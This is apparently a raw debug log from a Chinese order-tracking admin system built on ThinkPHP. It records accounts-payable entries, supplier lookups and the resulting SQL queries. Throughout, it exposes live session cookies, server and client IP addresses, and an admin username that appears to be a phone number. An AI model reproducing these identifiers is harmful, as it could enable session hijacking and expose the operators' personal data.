FROM `ot_admin_log` [ RunTime:0.000682s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('跟单系统 财务管理 应付账款 添加' , '{\"dialog\":\"1\",\"row\":{\"subject_type\":\"4\",\"suppliercustomer_id\":\"65\",\"worker_id\":\"\",\"explain\":\"\\u6c27\\u5316\\u8d39\",\"money\":\"9744\"}}' , '/admin/financial/accountspayable/add?dialog=1' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765701309) [ RunTime:0.004666s ] --------------------------------------------------------------- [ 2025-12-14T16:35:09+08:00 ] 39.144.91.198 GET /uploads/productpic/moren.png [ info ] 47.105.33.115:8081/uploads/productpic/moren.png [运行时间:0.020065s][吞吐率:49.84req/s] [内存消耗:2,225.99kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001346s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'productpic', 2 => 'moren.png', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Dalvik/2.1.0 (Linux; U; Android 8.0.0; FRD-AL10 Build/HUAWEIFRD-AL10)', 'host' => '47.105.33.115:8081', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:35:09+08:00 ] 106.112.204.117 GET /admin/financial/accountspayable/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22subject_type%22%3A%220%22%7D&op=%7B%22subject_type%22%3A%22LIKE%22%7D&_=1765701265748 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22subject_type%22%3A%220%22%7D&op=%7B%22subject_type%22%3A%22LIKE%22%7D&_=1765701265748 [运行时间:0.077572s][吞吐率:12.89req/s] [内存消耗:5,713.64kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001110s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"subject_type":"0"}', 'op' => '{"subject_type":"LIKE"}', '_' => '1765701265748', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001669s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->index[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000111s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000449s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000840s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000403s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000709s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001094s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000834s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000382s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountspayable` [ RunTime:0.000761s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.001049s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_worker` [ RunTime:0.000634s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 1 [ RunTime:0.012964s ] [ sql ] [ SQL ] SELECT `accountspayable`.`id`,`accountspayable`.`money`,`accountspayable`.`paid_money`,`accountspayable`.`yu_money`,`accountspayable`.`subject_type`,`accountspayable`.`putinstorage_id`,`accountspayable`.`amount`,`accountspayable`.`suppliercustomer_id`,`accountspayable`.`sour_fac_id`,`accountspayable`.`staffinfo_id`,`accountspayable`.`build_staffinfo_id`,`accountspayable`.`orderinfo_id`,`accountspayable`.`purchaseorder_id`,`accountspayable`.`worker_id`,`accountspayable`.`worker_name`,`accountspayable`.`explain`,`accountspayable`.`year`,`accountspayable`.`month`,`accountspayable`.`day`,`accountspayable`.`factorymge_id`,`accountspayable`.`createtime`,`accountspayable`.`updatetime`,suppliercustomer.id AS suppliercustomer__id,suppliercustomer.name AS suppliercustomer__name,suppliercustomer.phone AS suppliercustomer__phone,suppliercustomer.receiving_address AS suppliercustomer__receiving_address,suppliercustomer.source_fac_id AS suppliercustomer__source_fac_id,suppliercustomer.normalstatus AS suppliercustomer__normalstatus,suppliercustomer.factorymge_id AS suppliercustomer__factorymge_id,suppliercustomer.createtime AS suppliercustomer__createtime,suppliercustomer.updatetime AS suppliercustomer__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,worker.id AS worker__id,worker.name AS worker__name,worker.phone AS worker__phone,worker.IDcard AS worker__IDcard,worker.salary AS worker__salary,worker.factorymge_id AS worker__factorymge_id,worker.createtime AS worker__createtime,worker.updatetime AS worker__updatetime,worker.is_del AS worker__is_del FROM `ot_accountspayable` `accountspayable` LEFT JOIN `ot_suppliercustomer` `suppliercustomer` ON `accountspayable`.`suppliercustomer_id`=`suppliercustomer`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `accountspayable`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_worker` `worker` ON `accountspayable`.`worker_id`=`worker`.`id` WHERE `accountspayable`.`factorymge_id` = '40' AND ( 1=1 ) ORDER BY `accountspayable`.`id` DESC LIMIT 0,10 [ RunTime:0.000611s ] --------------------------------------------------------------- [ 2025-12-14T16:35:12+08:00 ] 106.112.204.117 GET /admin/financial/accountspayable/addyifu?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/addyifu?dialog=1 [运行时间:0.049319s][吞吐率:20.28req/s] [内存消耗:5,290.89kb] [文件加载:81] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001220s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'addyifu', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'dialog' => '1', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001563s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->addyifu[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/accountspayable/addyifu.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'subjectTypeList', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000110s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000416s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000697s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000412s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000659s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001246s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000830s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000318s ] --------------------------------------------------------------- [ 2025-12-14T16:35:12+08:00 ] 106.112.204.117 GET /admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1765701311 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.accountspayable&v=1765701311 [运行时间:0.031831s][吞吐率:31.42req/s] [内存消耗:3,855.01kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000061s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001205s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/addyifu?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.accountspayable', 'v' => '1765701311', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001596s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000108s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T16:35:15+08:00 ] 106.112.204.117 POST /admin/staffmge/suppliercustomer/getfacsuppliercustomer [ info ] 47.105.33.115:8081/admin/staffmge/suppliercustomer/getfacsuppliercustomer [运行时间:0.050264s][吞吐率:19.89req/s] [内存消耗:4,962.88kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000035s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001094s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.suppliercustomer', 2 => 'getfacsuppliercustomer', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '171', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/addyifu?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'q_word' => array ( 0 => '', ), 'pageNumber' => '1', 'pageSize' => '10', 'andOr' => 'AND', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'searchTable' => 'tbl', 'showField' => 'name', 'keyField' => 'id', 'searchField' => array ( 0 => 'name', ), 'name' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001460s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/suppliercustomer.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Suppliercustomer->getfacsuppliercustomer[ /alidata/www/gendan/application/admin/controller/staffmge/Suppliercustomer.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.009550s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000515s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.000942s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.000433s ] [ sql ] [ SQL ] SELECT * FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) ORDER BY `name` ASC LIMIT 0,10 [ RunTime:0.000594s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000854s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"q_word\":[\"\"],\"pageNumber\":\"1\",\"pageSize\":\"10\",\"andOr\":\"AND\",\"orderBy\":[[\"name\",\"ASC\"]],\"searchTable\":\"tbl\",\"showField\":\"name\",\"keyField\":\"id\",\"searchField\":[\"name\"],\"name\":\"\"}' , '/admin/staffmge/suppliercustomer/getfacsuppliercustomer' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765701315) [ RunTime:0.007377s ] --------------------------------------------------------------- [ 2025-12-14T16:35:17+08:00 ] 106.112.204.117 POST /admin/staffmge/suppliercustomer/getfacsuppliercustomer [ info ] 47.105.33.115:8081/admin/staffmge/suppliercustomer/getfacsuppliercustomer [运行时间:0.048029s][吞吐率:20.82req/s] [内存消耗:4,962.91kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001229s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.suppliercustomer', 2 => 'getfacsuppliercustomer', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '171', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/addyifu?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'q_word' => array ( 0 => '', ), 'pageNumber' => '2', 'pageSize' => '10', 'andOr' => 'AND', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'searchTable' => 'tbl', 'showField' => 'name', 'keyField' => 'id', 'searchField' => array ( 0 => 'name', ), 'name' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001475s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/suppliercustomer.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Suppliercustomer->getfacsuppliercustomer[ /alidata/www/gendan/application/admin/controller/staffmge/Suppliercustomer.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.006603s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000510s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.000888s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.000566s ] [ sql ] [ SQL ] SELECT * FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) ORDER BY `name` ASC LIMIT 10,10 [ RunTime:0.000505s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000787s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"q_word\":[\"\"],\"pageNumber\":\"2\",\"pageSize\":\"10\",\"andOr\":\"AND\",\"orderBy\":[[\"name\",\"ASC\"]],\"searchTable\":\"tbl\",\"showField\":\"name\",\"keyField\":\"id\",\"searchField\":[\"name\"],\"name\":\"\"}' , '/admin/staffmge/suppliercustomer/getfacsuppliercustomer' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765701317) [ RunTime:0.004634s ] --------------------------------------------------------------- [ 2025-12-14T16:35:18+08:00 ] 106.112.204.117 POST /admin/staffmge/suppliercustomer/getfacsuppliercustomer [ info ] 47.105.33.115:8081/admin/staffmge/suppliercustomer/getfacsuppliercustomer [运行时间:0.048681s][吞吐率:20.54req/s] [内存消耗:4,962.92kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001123s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.suppliercustomer', 2 => 'getfacsuppliercustomer', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '171', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/addyifu?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'q_word' => array ( 0 => '', ), 'pageNumber' => '3', 'pageSize' => '10', 'andOr' => 'AND', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'searchTable' => 'tbl', 'showField' => 'name', 'keyField' => 'id', 'searchField' => array ( 0 => 'name', ), 'name' => '', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001555s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/suppliercustomer.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Suppliercustomer->getfacsuppliercustomer[ /alidata/www/gendan/application/admin/controller/staffmge/Suppliercustomer.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.007444s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000471s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_suppliercustomer` [ RunTime:0.000742s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) LIMIT 1 [ RunTime:0.000378s ] [ sql ] [ SQL ] SELECT * FROM `ot_suppliercustomer` WHERE ( `name` LIKE '%%' ) AND ( factorymge_id =40 ) AND ( 1=1 ) ORDER BY `name` ASC LIMIT 20,10 [ RunTime:0.000395s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000670s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"q_word\":[\"\"],\"pageNumber\":\"3\",\"pageSize\":\"10\",\"andOr\":\"AND\",\"orderBy\":[[\"name\",\"ASC\"]],\"searchTable\":\"tbl\",\"showField\":\"name\",\"keyField\":\"id\",\"searchField\":[\"name\"],\"name\":\"\"}' , '/admin/staffmge/suppliercustomer/getfacsuppliercustomer' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765701318) [ RunTime:0.005649s ] --------------------------------------------------------------- [ 2025-12-14T16:35:28+08:00 ] 106.112.204.117 POST /admin/financial/accountspayable/addyifu?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/accountspayable/addyifu?dialog=1 [运行时间:0.073444s][吞吐率:13.62req/s] [内存消耗:5,565.28kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001242s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.accountspayable', 2 => 'addyifu', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '241', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/accountspayable/addyifu?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'row' => array ( 'subject_type' => '4', 'suppliercustomer_id' => '65', 'worker_id' => '', 'explain' => '氧化费', 'paid_money' => '9744', ), ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001581s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/financial/accountspayable.php [ info ] [ RUN ] app\admin\controller\financial\Accountspayable->addyifu[ /alidata/www/gendan/application/admin/controller/financial/Accountspayable.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.006594s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000653s ] 